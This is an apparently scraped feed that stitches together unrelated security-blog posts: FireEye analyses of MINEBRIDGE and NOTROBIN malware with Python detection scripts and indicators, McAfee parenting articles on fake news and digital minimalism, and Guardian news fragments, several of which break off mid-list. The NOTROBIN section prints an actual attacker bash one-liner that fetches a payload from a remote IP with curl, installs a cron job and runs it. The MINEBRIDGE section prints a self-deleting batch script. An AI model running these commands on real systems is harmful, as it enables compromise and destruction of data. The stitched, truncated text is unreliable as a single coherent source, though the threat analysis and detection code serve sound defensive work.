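"""Classify a captured HTTP request against the MINEBRIDGE beacon profile
described above (URI, User-Agent, C2 domains, POST body layout, GUID shape).
"""
import re
from urllib.parse import parse_qs

# Indicators taken from the post; domains are written defanged here and
# normalised before comparison against a Host header.
C2_DOMAINS = {d.replace("[.]", ".") for d in (
    "123faster[.]top", "conversia91[.]top", "fatoftheland[.]top",
    "creatorz123[.]top", "compilator333[.]top")}
BEACON_URI = "/~f83g7bfiunwjsd1/g4t3_indata.php"   # assumed to be rooted at "/"
BEACON_USER_AGENT = ("Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) "
                     "AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 "
                     "Mobile/15B150 Safari/604.1")
BEACON_FIELDS = ["uuid", "id", "pass", "username", "pcname", "osver", "timeout"]
# %06lX-%04lX-%04lX-%06lX: upper-case hex, zero-padded to *minimum* widths.
GUID_RE = re.compile(r"^[0-9A-F]{6,}-[0-9A-F]{4,}-[0-9A-F]{4,}-[0-9A-F]{6,}$")


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for h in header_lines:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def beacon_indicators(raw: str) -> dict:
    """Return which MINEBRIDGE beacon traits a request exhibits."""
    req = parse_http_request(raw)
    params = parse_qs(req["body"], keep_blank_values=True)
    body_layout = req["method"] == "POST" and list(params) == BEACON_FIELDS
    guid = params.get("uuid", [""])[0]
    return {
        "c2_domain": req["headers"].get("host", "").lower() in C2_DOMAINS,
        "beacon_uri": req["path"] == BEACON_URI,
        "user_agent": req["headers"].get("user-agent") == BEACON_USER_AGENT,
        "body_layout": body_layout,
        "guid_format": bool(GUID_RE.match(guid)),
    }


def is_minebridge_beacon(raw: str) -> bool:
    """The body layout is the strongest single trait; require it plus at least
    one more so a stray iPhone User-Agent alone does not fire."""
    hits = beacon_indicators(raw)
    return hits["body_layout"] and sum(hits.values()) >= 2


# Constructed sample requests (placeholder values, not real captures).
SAMPLE_BEACON = (
    "POST /~f83g7bfiunwjsd1/g4t3_indata.php HTTP/1.1\r\n"
    "Host: creatorz123.top\r\n"
    "User-Agent: " + BEACON_USER_AGENT + "\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "uuid=1A2B3C-4D5E-6F70-8192A3&id=123456789&pass=abcd1234"
    "&username=user&pcname=DESKTOP-EXAMPLE&osver=6.1&timeout=60"
)
SAMPLE_BENIGN = (
    "POST /api/login HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
    "username=user&password=secret"
)

if __name__ == "__main__":
    for label, raw in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        print(label, is_minebridge_beacon(raw), beacon_indicators(raw))
```

Matching on the exact field order rather than on individual parameter names keeps the rule from tripping on ordinary login forms that also carry a username field, while the separate indicator dictionary lets an analyst see which traits a near miss did and did not exhibit.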

After a response is received, it's processed for commands. A single response may contain multiple commands. For each command executed, the sample sends an HTTPS POST request over TCP port 443 indicating success or failure. The sample responds to the commands below:

  • Download and execute an executable from a URL provided in the command. The file is saved to %TEMP%\<32_rand_chars>.exe.
  • Download a custom XOR-encoded and LZNT1-compressed DLL from a URL provided in the command and save it to %TEMP%\<32_rand_chars>. Decode, decompress, and load the DLL in memory and call its entrypoint.
  • Move the sample file to <sample_name>.old and download a new version of itself to <sample_name>, where <sample_name> is the name of this sample (i.e., msi.dll). Relaunch the hosting TeamViewer application with command-line argument COM1_. Delete <sample_name>.old.
  • Relaunch the hosting TeamViewer application with command-line argument COM1_.
  • Terminate the hosting TeamViewer application.
  • Create and execute the self-deleting batch script tvdll.cmd to delete all unzipped files as well as the sample file. Terminate the hosting TeamViewer application.
  • Shut down the system.
  • Reboot the system.
  • Update the C2 beacon-interval time.

After executing all commands in the response, the sample sleeps for the designated C2 beacon-interval time. It repeats the process outlined above to send the next C2 beacon. This behavior repeats indefinitely.

The self-deleting batch script tvdll.cmd contains the following content, where <renamed_TeamViewer> is the renamed TeamViewer executable (i.e., wpvnetwks.exe) and <sample_name> is the name of this sample (i.e., msi.dll).

@echo off
ping -n 1 -w 5000 > nul
goto nosleep1
ping -n 1 -w 750 > nul
attrib -a -h -s -r %~d0%~p0TeamViewer_Resource_en.dll
del /f /q %~d0%~p0TeamViewer_Resource_en.dll
if exist  "%~d0%~p0TeamViewer_Resource_en.dll" goto redel1
goto nosleep2
ping -n 1 -w 750 > nul
attrib -a -h -s -r %~d0%~p0TeamViewer_StaticRes.dll
del /f /q %~d0%~p0TeamViewer_StaticRes.dll
if exist  "%~d0%~p0TeamViewer_StaticRes.dll" goto redel2
goto nosleep3
ping -n 1 -w 750 > nul
attrib -a -h -s -r %~d0%~p0TeamViewer_Desktop.exe
del /f /q %~d0%~p0TeamViewer_Desktop.exe
if exist  "%~d0%~p0TeamViewer_Desktop.exe" goto redel3
goto nosleep4
ping -n 1 -w 750 > nul
attrib -a -h -s -r %~d0%~p0TeamViewer.ini
del /f /q %~d0%~p0TeamViewer.ini
if exist  "%~d0%~p0TeamViewer.ini" goto redel4
goto nosleep5
ping -n 1 -w 750 > nul
attrib -a -h -s -r %~d0%~p0<sample_name>
del /f /q %~d0%~p0<sample_name>
if exist  "%~d0%~p0<sample_name>" goto redel5
goto nosleep6
ping -n 1 -w 750 > nul
attrib -a -h -s -r %~d0%~p0<renamed_TeamViewer>
del /f /q %~d0%~p0<renamed_TeamViewer>
if exist  "%~d0%~p0<renamed_TeamViewer>" goto redel6
attrib -a -h -s -r %0
del /f /q %0

Possible Connection to Another Intrusion Set

The identified MINEBRIDGE samples have been packed within a loader we call MINEDOOR. Since Fall 2019, we’ve observed a group publicly tracked as TA505 conducting phishing campaigns that use MINEDOOR to deliver the FRIENDSPEAK backdoor. The combination of MINEDOOR and FRIENDSPEAK has also been publicly discussed using the name Get2.

The limited overlap in tactics, techniques, and procedures (TTPs) between campaigns delivering MINEBRIDGE and those delivering FRIENDSPEAK may suggest that MINEDOOR is not exclusive to TA505. Recent campaigns delivering FRIENDSPEAK have appeared to use spoofed sender addresses, Excel spreadsheets with embedded payloads, and campaign-specific domains that masquerade as common technology services. Meanwhile, the campaigns delivering MINEBRIDGE have used actor-controlled email addresses, malicious Word documents that download payloads from a remote server, and domains with a variety of themes sometimes registered weeks in advance of the campaign. The campaigns delivering MINEBRIDGE also appear to be significantly smaller in both volume and scope than the campaigns delivering FRIENDSPEAK. Finally, we observed campaigns delivering MINEBRIDGE on Eastern Orthodox Christmas when Russian-speaking actors are commonly inactive; we did not observe campaigns delivering FRIENDSPEAK during the week surrounding the holiday and language resources in the malware may suggest TA505 actors speak Russian.

It is plausible that these campaigns represent a subset of TA505 activity. For example, they may be operations conducted on behalf of a specific client or by a specific member of the broader threat group. Both sets of campaigns used domains that were registered with Eranet and had the registrant location “JL, US” or “Fujian, CN,” however this overlap is less notable because we suspect that TA505 has used domains registered by a service that reuses registrant information.

Post-compromise activity would likely reveal if these campaigns were conducted by TA505 or a second threat group, however, FireEye has not yet observed any instances in which a host has been successfully compromised by MINEBRIDGE. As such, FireEye currently clusters this activity separately from what the public tracks as TA505.


FireEye would like to thank all the dedicated authors of open source tooling and research referenced in this blog post. Further, FireEye would like to thank TeamViewer for their collaboration with us on this matter. The insecure DLL loading highlighted in this blog post was resolved in TeamViewer 11.0.214397, released on October 22, 2019, prior to the TeamViewer team receiving any information from FireEye. Additionally, TeamViewer is working to add further mitigations for the malware’s functionality. FireEye will update this post with further data from TeamViewer when this becomes available.

Indicators of Compromise (IOCs)

Suspicious Behaviors
  • Process lineage: Microsoft Word launching TeamViewer
  • Directory Creation: %APPDATA%\Windows Media Player
  • File Creation:
    • %APPDATA%\Windows Media Player\msi.dll
    • %APPDATA%\Windows Media Player\msi.dll.old
    • %APPDATA%\Windows Media Player\tvdll.cmd
    • %APPDATA%\Windows Media Player\wpvnetwks.exe
    • %APPDATA%\Windows Media Player\TeamViewer_Resource_en.dll
    • %APPDATA%\Windows Media Player\TeamViewer_StaticRes.dll
    • %APPDATA%\Windows Media Player\TeamViewer_Desktop.exe
    • %APPDATA%\Windows Media Player\TeamViewer.ini
    • %CSIDL_STARTUP%\Windows WMI.lnk
    • %CSIDL_PROFILE%\<dll_name>.xpdf
    • %TEMP%\<32 random characters>
    • %TEMP%\<32 random characters>.exe
    • %TEMP%\~8426bcrtv7bdf.bin
  • Network Activity:
    • HTTPS Post requests to C2 URLs
    • User-Agent String: "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1"

C2 Domains

  • 123faster[.]top
  • conversia91[.]top
  • fatoftheland[.]top
  • creatorz123[.]top
  • compilator333[.]top

Download Domains

  • neurogon[.]com
  • tiparcano[.]com
  • seigortan[.]com
  • marendoger[.]com
  • badiconreg[.]com

Sender Domains

  • pt-cpaaccountant[.]com
  • rogervecpa[.]com
  • agent4career[.]com
  • bestrecruitments[.]com

Phishing Documents

Spotting Fake News: Teaching Kids to be Responsible Online Publishers


Editor’s note: This is part II in a series on Fake News. Read part I, here.

Kids today are not equipped to deal with the barrage of digital information coming at them every day. Add to that, the bulk of information that may be fake, misleading, or even malicious. So how do we help kids become more responsible for the content they share online?

We do it one conversation at a time.

When it comes to the mounting influence of fake news, it’s easy to point the finger at the media, special interest groups, politicians, and anyone else with an agenda and internet access. While many of these groups may add to the problem, each one of us plays a role in stopping it.

What’s our role?

We, the connected consumer, now play such a significant role in how content is created and disseminated, that a large part of the solution comes down to individual responsibility — yours and mine.

The shift begins with holding ourselves accountable for every piece of content we read, create, or share online. That shift gains momentum when we equip our kids to do the same.

Teach personal responsibility. Start the conversation around personal responsibility early with your kids and keep it going. Explain that every time we share fake news, a rumor, or poorly sourced material, we become one cog in the wheel of spreading untruths and even malicious fabrications. We become part of the problem. Challenge your child to become a trustworthy, discerning source of information as opposed to being viewed by others as an impulsive, unreliable source.

Discuss the big picture. Fake news or misleading content isn’t just annoying; it’s harmful in a lot of other ways. Misinformation undermines trust, causes division, can spark social unrest, and harm unity. More than that, fake news edges out helpful, factual, content designed to educate and inform.

Be aware of confirmation bias. Confirmation bias is gravitating toward ideas, people, and content that echoes our spiritual, social, political, or moral points of view. Confirmation bias tempts us to disregard information that opposes our ideology. While confirmation bias is part of our human nature, left unchecked, it can be an obstacle to learning factual information.

Chill, don’t spill. Fake news is designed to advance a personal agenda. This is especially true during times of social tension when tempers are running high. Don’t take the emotional bait. Exercise discernment. Before sharing, read legitimate news sources that offer balanced coverage, so the story you share or opinion you express is based on accurate information.

Be a free thinker. Our kids have grown up in a world where ‘like’ and ‘share’ counts somehow equate to credibility. Encourage kids to break away from the crowd and have the courage to be free, independent thinkers.

Challenge content by asking:

  • Do I understand all the points of view of this story?
  • What do I really think about this topic or idea?
  • Am I overly emotional and eager to share this?
  • Am I being manipulated by this content?
  • What if I’m wrong?

Question every source. Studies show that people assume that the higher something ranks in search results, the more factual or trustworthy the information is. Wrong. Algorithms retrieve top content based on keywords, not accuracy. So, dig deeper and verify sources.

5 ways to spot fake news

1. Look closely at the source. Fake news creators are good at what they do. While some content has detectable errors, others are sophisticated and strangely persuasive. So, take a closer look. Test credibility by asking:

  • Where is the information coming from? 
  • Is this piece satire?
  • Is the author of the article, bio, and website legitimate? 
  • Are studies, infographics, and quotes appropriately attributed?
  • Is the URL legitimate (cnn.comvs.
  • Are there red flags such as unknown author, all capital letters, misspellings, or grammar errors?

2. Be discerning with viral content. Often a story will go viral because it’s so unbelievable. So pause before you share. Google the story’s headline to see if the story appears in other reliable publications.

3. Pay attention to publish dates, context. Some viral news items may not be entirely false, just intentionally shared out of context. Fake news creators often pull headlines or stories from the past and present them as current news to fit the desired narrative.

4. Beware of click-bait headlines. A lot of fake news is carefully designed with user behavior in mind. A juicy headline leads to a false news story packed with even more fake links that take you to a product page or, worse, download malware onto your computer, putting your data and privacy at risk. These kinds of fake news scams capitalize on emotional stories such as the recent tragic death of basketball great Kobe Bryant.

5. Verify information. It takes extra effort, but plenty of sites exist that can help you verify a piece of information. Before sharing a piece of content, check it out on sites like:


While fake news isn’t a new phenomenon, thanks to technology’s amplification power, it’s reached new levels of influence and deception. This social shift makes it imperative to get in front of this family conversation as soon as possible especially since we’re headed into an election year.

The post Spotting Fake News: Teaching Kids to be Responsible Online Publishers appeared first on McAfee Blogs.

Jeff Bezos met FBI investigators in 2019 over alleged Saudi hack

Amazon founder interviewed as FBI conducts inquiry into Israeli firm linked to malware

Jeff Bezos met federal investigators in April 2019 after they received information about the alleged hack of the billionaire’s mobile phone by Saudi Arabia, the Guardian has been told.

Bezos was interviewed by investigators at a time when the FBI was conducting an investigation into the Israeli technology company NSO Group, according to a person who was present at the meeting.


I’m still on Windows 7 – what should I do?

Support for Windows 7 has ended, leaving Marcy wondering how they can protect themselves

I do a lot of work on a Windows 7 desktop PC that is about five years old. I’m a widow and can’t afford to run out and get a new PC at this time, or pay for Windows 10. If I do stay with Windows 7, what should I worry about, and how can I protect myself? I have been running Kaspersky Total Security for several years, which has worked well so far. Marcy

Microsoft Windows 7 – launched in 2009 – came to the end of its supported life on Tuesday. Despite Microsoft’s repeated warnings to Windows 7 users, there may still be a couple of hundred million users, many of them in businesses. What should people do next?


404 Exploit Not Found: Vigilante Deploying Mitigation for Citrix NetScaler Vulnerability While Maintaining Backdoor

As noted in Rough Patch: I Promise It'll Be 200 OK, our FireEye Mandiant Incident Response team has been hard at work responding to intrusions stemming from the exploitation of CVE-2019-19781. After analyzing dozens of successful exploitation attempts against Citrix ADCs that did not have the Citrix mitigation steps implemented, we’ve recognized multiple groups of post-exploitation activity. Within these, something caught our eye: one particular threat actor that’s been deploying a previously-unseen payload for which we’ve created the code family NOTROBIN.

Upon gaining access to a vulnerable NetScaler device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign.

Initial Compromise

This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device. They issue an HTTP POST request from a Tor exit node to transmit the payload to the vulnerable CGI script. For example, Figure 1 shows a web server access log entry recording exploitation:

- - [12/Jan/2020:21:55:19 -0500] "POST /vpn/../vpns/portal/scripts/ HTTP/1.1" 304 - "-" "curl/7.67.0"

Figure 1: Web log showing exploitation

Unlike other actors, this actor appears to exploit devices using a single HTTP POST request that results in an HTTP 304 response—there is no observed HTTP GET to invoke staged commands. Unfortunately, we haven’t recovered the POST body contents to see how it works. In any case, exploitation causes the Bash one-liner shown in Figure 2 to run on the compromised system:

pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o /tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * * /var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

Figure 2: Bash exploit payload

This is the same methodology as described in Rough Patch: I Promise It'll Be 200 OK. The effects of this series of commands include:

  1. Kill and delete all running instances of netscalerd—a common process name used for cryptocurrency mining utilities deployed to NetScaler devices.
  2. Create a hidden staging directory /tmp/.init, download NOTROBIN to it, and enable the execute permission.
  3. Install /var/nstmp/.nscache/httpd for persistence via the cron daemon. This is the path to which NOTROBIN will copy itself.
  4. Manually execute NOTROBIN.

There’s a lot to unpack here. Of note, the actor removes malware known to target NetScaler devices via the CVE-2019-19781 vulnerability. Cryptocurrency miners are generally easy to identify—just look for the process utilizing nearly 100% of the CPU. By uninstalling these unwanted utilities, the actor may hope that administrators overlook an obvious compromise of their NetScaler devices.

The actor uses curl to fetch NOTROBIN from the hosting server with IP address 95.179.163[.]186 that appears to be an abandoned WordPress site. FireEye has identified many payloads hosted on this server, each named after their embedded authentication key. Interestingly, we haven’t seen reuse of the same payload across multiple clients. Compartmenting payloads indicates the actor is exercising operational security.

FireEye has recovered cron syslog entries, such as those shown in Figure 3, that confirm the persistent installation of NOTROBIN. Note that these entries appear just after the initial compromise. This is a robust indicator of compromise to triage NetScaler devices.

Jan 12 21:57:00 <> foo.netscaler /usr/sbin/cron[73531]: (nobody) CMD (/var/nstmp/.nscache/httpd)

Figure 3: cron log entry showing NOTROBIN execution

Now, let’s turn our attention to what NOTROBIN does.

Analysis of NOTROBIN

NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

When executed, NOTROBIN ensures that it is running from the path /var/nstmp/.nscache/httpd. If not, the utility copies itself to this path, spawns the new copy, and then exits itself. This provides detection cover by migrating the process from /tmp/, a suspicious place for long-running processes to execute, to an apparently NetScaler-related, hidden directory.

Now the fun begins: it spawns two routines that periodically check for and delete exploits.

Every second, NOTROBIN searches the directory /netscaler/portal/scripts/ for entries created within the last 14 days and deletes them, unless the filename or file content contains a hardcoded key (example: 64d4c2d3ee56af4f4ca8171556d50faa). Open source reporting indicates that some actors write scripts into this directory after exploiting CVE-2019-19781. Therefore, we believe that this routine cleans the system of publicly known payloads, such as

Eight times per second, NOTROBIN searches for files with an .xml extension in the directory /netscaler/portal/templates/. This is the directory into which exploits for CVE-2019-19781 write templates containing attacker commands. NOTROBIN deletes files that contain either of the strings block or BLOCK, which likely match potential exploit code, such as that found in the ProjectZeroIndia exploit; however, the utility does not delete files with a filename containing the secret key.

FireEye believes that actors deploy NOTROBIN to block exploitation of the CVE-2019-19781 vulnerability while maintaining backdoor access to compromised NetScaler devices. The mitigation works by deleting staged exploit code found within NetScaler templates before it can be invoked. However, when the actor provides the hardcoded key during subsequent exploitation, NOTROBIN does not remove the payload. This lets the actor regain access to the vulnerable device at a later time.

Across multiple investigations, FireEye observed actors deploying NOTROBIN with unique keys. For example, we’ve recovered nearly 100 keys from different binaries. These look like MD5 hashes, though FireEye has been unsuccessful in recovering any plaintext. Using complex, unique keys makes it difficult for third parties, such as competing attackers or FireEye, to easily scan for NetScaler devices “protected” by NOTROBIN. This actor follows a strong password policy!

Based on strings found within NOTROBIN, the actor appears to inject the key into the Go project using source code files named after the key. Figure 4 and Figure 5 show examples of these filenames.


Figure 4: Source filename recovered from NOTROBIN sample


Figure 5: Source filename recovered from NOTROBIN sample

We wonder if “tmpl_ci” refers to a Continuous Integration setup that applies source code templating to inject keys and build NOTROBIN variants. We also hope the actor didn’t have to revert to backups after losing the original source!

Outstanding Questions

NOTROBIN spawns a background routine that listens on UDP port 18634 and receives data; however, it drops the data without inspecting it. You can see this logic in Figure 6. FireEye has not uncovered a purpose for this behavior, though DCSO makes a strong case for this being used as a mutex, as only a single listener can be active on this port.

Figure 6: NOTROBIN logic that drops UDP traffic

There is also an empty function main.install_cron whose implementation has been removed, so alternatively, perhaps these are vestiges of an early version of NOTROBIN. In any case, a NetScaler device listening on UDP port 18634 is a reliable indicator of compromise. Figure 7 shows an example of listing the open file handles on a compromised NetScaler device, including a port listening on UDP 18634.

Figure 7: File handling listing of compromised NetScaler device


During one engagement, FireEye reviewed forensic evidence of NetScaler exploitation attempts against a single device, both before and after NOTROBIN was deployed by an actor. Prior to January 12, before NOTROBIN was installed, we identified successful attacks from multiple actors. But, across the following three days, more than a dozen exploitation attempts were thwarted by NOTROBIN. In other words, NOTROBIN inoculated the vulnerable device from further compromise. For example, Figure 8 shows a log message that records a failed exploitation attempt.

- - [13/Jan/2020:05:09:07 -0500] "GET /vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1" 404 48 "-"

Figure 8: Web log entry showing a failed exploitation attempt

Note that the application server responded with HTTP 404 (“Not Found”) as this actor attempts to invoke their payload staged in the template wTyaINaDVPaw8rmh.xml. NOTROBIN deleted the malicious template shortly after it was created – and before it could be used by the other actor.
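
The three log artifacts shown in Figures 1, 3 and 8 (the exploitation POST through the path traversal, the cron entry that launches the persisted copy, and a template GET answered with 404 because NOTROBIN had already deleted the file) can be triaged together from a NetScaler's access log and syslog. The following is an added example written for this page, not FireEye's tooling: it classifies lines of both formats and reports what each represents. The sample lines are constructed after the figures; the source addresses are from documentation ranges and the second template name is made up.

```python
"""Triage web-server access logs and cron syslog lines for the NOTROBIN
activity described above: the exploitation POST (Figure 1), the cron entry
that persists NOTROBIN (Figure 3), and template invocations that NOTROBIN
blocked (Figure 8, HTTP 404) versus those that succeeded.
"""
import re

# Combined-format access log:
#   ip ident user [time] "method path proto" status size "referer" "user-agent"
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"')
TRAVERSAL = "/vpn/../vpns/portal/"          # CVE-2019-19781 path traversal
NOTROBIN_PATH = "/var/nstmp/.nscache/httpd"  # persisted NOTROBIN copy


def classify_access_line(line: str):
    """Return a finding tag for an access-log line, or None if uninteresting."""
    m = ACCESS_RE.match(line)
    if not m or TRAVERSAL not in m["path"]:
        return None
    method, path, status = m["method"], m["path"], m["status"]
    if method == "POST" and "/scripts/" in path:
        return "exploit-post"          # template staged through the CGI script
    if method == "GET" and path.endswith(".xml"):
        # NOTROBIN deletes staged templates, so the follow-up GET finds nothing.
        return "template-blocked" if status == "404" else "template-executed"
    return "traversal-other"


def classify_syslog_line(line: str):
    """Flag cron executing the NOTROBIN persistence path."""
    if "cron" in line and "CMD (" in line and NOTROBIN_PATH in line:
        return "notrobin-cron"
    return None


def triage(lines):
    """Run both classifiers over mixed log lines, returning (tag, line) pairs."""
    findings = []
    for line in lines:
        tag = classify_access_line(line) or classify_syslog_line(line)
        if tag:
            findings.append((tag, line))
    return findings


# Constructed log lines modelled on Figures 1, 3 and 8 (source addresses are
# from documentation ranges; the second template name is made up).
SAMPLE_LINES = [
    '203.0.113.5 - - [12/Jan/2020:21:55:19 -0500] "POST /vpn/../vpns/portal/scripts/ HTTP/1.1" 304 - "-" "curl/7.67.0"',
    'Jan 12 21:57:00 <> foo.netscaler /usr/sbin/cron[73531]: (nobody) CMD (/var/nstmp/.nscache/httpd)',
    '198.51.100.7 - - [13/Jan/2020:05:09:07 -0500] "GET /vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1" 404 48 "-" "curl/7.67.0"',
    '198.51.100.7 - - [11/Jan/2020:03:01:44 -0500] "GET /vpn/../vpns/portal/constructed0001.xml HTTP/1.1" 200 512 "-" "curl/7.67.0"',
    '192.0.2.9 - - [13/Jan/2020:08:00:00 -0500] "GET /vpn/index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for tag, line in triage(SAMPLE_LINES):
        print(f"{tag:18} {line}")
```

The useful distinction for an investigator is the status code on the template GET: a 200 means the staged template was rendered and the attacker's commands ran, while a 404 on the same traversal path after the cron entry appears is the footprint of NOTROBIN, and therefore of a device that was already compromised by the NOTROBIN actor before the blocked attempt.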

FireEye has not yet identified if the actor has returned to NOTROBIN backdoors.


FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators that check into their devices after reading Citrix security bulletin CTX267027. NOTROBIN mitigates CVE-2019-19781 on compromised devices but retains a backdoor for an actor with a secret key. While we haven’t seen the actor return, we’re skeptical that they will remain a Robin Hood character protecting the internet from the shadows.

Indicators of Compromise and Discovery

Table 1 lists indicators that match NOTROBIN variants that FireEye has identified. The domain vilarunners[.]cat is the WordPress site that hosted NOTROBIN payloads. The domain resolved to 95.179.163[.]186 during the time of observed activity. As of January 15, the vilarunners[.]cat domain currently resolves to a new IP address of 80.240.31[.]218.

  • HTTP URL prefix: hxxps://95.179.163[.]186/wp-content/uploads/2018/09/ (the payload URL seen in Figure 2, minus the per-victim key)
  • Crontab entry: * * * * * /var/nstmp/.nscache/httpd
  • Listening UDP port: 18634
  • Remote IP: 95.179.163[.]186
  • Remote IP: 80.240.31[.]218

Table 1: Indicators of Compromise

Discovery on VirusTotal

You can use the following VTI queries to identify NOTROBIN variants on VirusTotal:

  • vhash:"73cee1e8e1c3265c8f836516c53ae042"
  • vhash:"e57a7713cdf89a2f72c6526549d22987"

Note, the vHash implementation is private, so we’re not able to confirm why this technique works. In practice, the vHashes cover the same variants identified by the Yara rule listed in Figure 9.

rule NOTROBIN
{
    meta:
        author = ""
        date_created = "2020-01-15"
    strings:
        $func_name_1 = "main.remove_bds"
        $func_name_2 = "main.xrun"
    condition:
        all of them
}

Figure 9: Yara rule that matches on NOTROBIN variants

Recovered Authentication Keys

FireEye has identified nearly 100 hardcoded keys from NOTROBIN variants that the actor could use to re-enter compromised environments. We expect that these strings may be found within subsequent exploitation attempts, either as filenames or payload content. Although we won’t publish them here out of concern for our customers, please reach out if you’re looking for NOTROBIN within your environment and we can provide a list.


Thank you to analysts across FireEye that are currently responding to this activity, including Brandan Schondorfer for collecting and interpreting artifacts, Steven Miller for coordinating analysis, Evan Reese for pivoting across intel leads, Chris Glyer for reviewing technical aspects, Moritz Raabe for reverse engineering NOTROBIN samples, and Ashley Frazer for refining the presentation and conclusions.

Microsoft rolls out Windows 10 security fix after NSA warning

US agency revealed flaw that could be exploited by hackers to create malicious software

Microsoft is rolling out a security fix to Windows 10 after the US National Security Agency (NSA) warned the popular operating system contained a highly dangerous flaw that could be used by hackers. Reporting the vulnerability represents a departure for the NSA from its past strategy of keeping security flaws under wraps to exploit for its own intelligence needs.

The NSA revealed during a press conference on Tuesday that the “serious vulnerability” could be used to create malicious software that appeared to be legitimate. The flaw “makes trust vulnerable”, the NSA director of cybersecurity, Anne Neuberger, said in a briefing call to media on Tuesday.


Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset  


Editor’s Note: This is part II of a series on Digital Minimalism in 2020.

Is this the year you rethink and rebuild your relationship with technology? If so, embracing digital minimalism may be the most powerful way to achieve that goal.

We learned last week in our first post on this series that digital minimalism isn’t about chucking your devices and going off the grid. It’s about being hyper intentional that your technology choices support the things you value.

And, as outlined by Cal Newport in his book, Digital Minimalism: Choosing a Focused Life in a Noisy World, the first step in the process is clarifying your values. Your values are the guiding principles that motivate you and give your life meaning such as family, education, work/life balance, community service, friendship, integrity, health, or wealth. With values clearly defined, you can evaluate every piece of technology, app, or social network you use to be sure it aligns with those values.

For instance, if you establish your top values to be family and volunteering, then maybe it’s time to let go of all the podcasts, apps, and email subscriptions that no longer support those priorities. The online social communities you habitually peruse may trigger anxiety and be taking time from activities that could be far more fulfilling.

If you get overwhelmed amid your technology pruning, come back to these two critical questions:

  • Does this technology directly support something that I deeply value?
  • Is this technology the best way to support this value?

There’s a ton of great information as well as passion online around the concept of digital minimalism. But to keep this new idea “minimal” and easy to grasp, we’ve chosen 5 things you can do today to help you and your family jumpstart this new way of thinking.

5 ways to jumpstart a ‘digital minimalist’ mindset

  1. Make social accounts private. Last week we suggested cutting all non-essential media for 30 days. Another way to mentally shift into a minimalist mindset is to transition your social media accounts from public to private if you haven’t already. Not only will this small change increase your online privacy, but it could also help you become more aware of the amount of content you share, the people with whom you share it, and the value of what you share. For people who post frequently (and often out of habit), this may prove to be a game-changer. The goal of digital minimalism isn’t a digital detox or white-knuckling no-or-less-tech life. The goal is to consciously, willingly, and consistently be rebuilding your relationship with technology into a formula that decreases distraction and increases value.
  2. Audit those apps! Want to feel a rush of minimalist adrenaline? Whack some apps! Most of us have amassed a galaxy of apps on our phones, tablets, and laptops. Newport suggests getting rid of any apps or devices that continuously distract and are “outside of work.” Those brain games, cooking apps, calorie trackers, and delivery apps you rarely use or value, may no longer be relevant to your values. Some will find this exercise exhilarating, while others may feel panicked. If that’s the case, pace yourself and delete a handful of apps over the next few weeks. The goal is more peace, not panic. On a security note: Remember, apps are one of the main channels for malware. Consider adding security software to your family devices, reading app reviews, and only downloading trusted products.
  3. Reclaim your space. Do you carry your phone with you into restaurants, upstairs, on a walk, and even to the bathroom? If so, this step may be especially tricky but incredibly beneficial. Think about it — you weren’t born with a phone. Over the years, it became a companion, maybe even an extra appendage. So start small to reclaim your birthright to phone-free space. If you go outside to walk your dog, leave your phone inside. Are you headed into a restaurant? Leave the phone in the car. Newport also suggests leaving your phone in a fixed spot in your home and treating it like the “house phones” of the past. When you go to bed, leave your phone in another room. Over time, hopefully, these small changes will add more hours, sleep, relaxation, conversation, and contemplation to your day.
  4. Condense home screens, turn off all notifications. Clutter — especially digital clutter — can trigger feelings of chaos and anxiety. By creating folders for random files and apps on your laptop, tablet, and phone, you can declutter and breathe a little easier. If later you can’t find a document, use the search tool on your device. Also, turn off all notifications, including your phone ringer, to reduce interruptions and to avoid the temptation to phub (phone snub) the person in front of you.
  5. Replace device time with more productive activities. The pain and regret of the social media time suck are very real. We lose days, even years going down digital rabbit holes and getting emotionally invested in random social media posts and exchanges. Some ideas: If you are a night scroller, opt to read a physical book. If you take breaks to scroll during work hours, put your phone in a drawer — out of sight, out of mind. If you’ve defined “relaxing” as curling up with your coffee and phone and reading through social feeds, reclaim those hours by calling a friend, taking a walk, connecting with your family, reading, or getting outside.

